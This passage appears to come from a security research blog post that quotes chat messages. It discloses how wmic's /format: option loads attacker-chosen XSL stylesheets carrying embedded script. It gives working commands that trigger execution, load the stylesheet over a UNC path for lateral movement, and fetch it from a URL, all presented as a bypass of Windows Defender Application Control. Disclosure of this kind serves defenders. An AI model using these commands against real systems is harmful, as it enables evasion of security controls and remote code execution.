A bit of looking at ProcMon and we confirmed that this indeed was how that file l was loaded.

I decided to change the /format: parameter to see if I could influence the search and possible get it to load my own file.

subtee [8:16 AM]

look at it searching for xsl with this.

C:\>wmic process LIST /FORMAT:wtf.xsl

So, NOW we have something interesting. We have wmic searching for a user supplied stylesheet.

Who cares about stylesheets? Well, there are some really interesting tags that allow you to embed JScript or VBScript. If this executes those, it will likely execute in a constrained mode like AppLocker or where Windows Script Host has been disabled.

After some validation by both Matt Graeber and Matt Nelson @enigma0x3 , it was confirmed that we had an unconstrained script host bypass for Windows Defender Application Control

(aka Device Guard)

The importance of this is that this primitive leads to arbitrary binary execution, thanks to the work and techniques developed James Forshaw @tiraniddo.

But we are just getting started! It gets way better.

What we have so far is this:

wmic os get /format:”MYXSLFILE.xsl” To trigger execution.

subtee [9:15 AM]

Who would have thought wmic processes xslt lol, I can't stop laughing

subtee [9:50 AM]

This can probably be used for some lateral movement, exec wmic on the target and have it reach back and pull the xsl file like this `wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"`

You can even drop the xsl and it resolves `wmic process get brief /format:"\\127.0.0.1\c$\Tools\csv"`

to try to blend in

... this works too

“wmic process get brief /format:"https://www.example.com/file.xsl”

SO here we have it, another tool, like regsvr32.exe that can accept a script path, or url and execute it.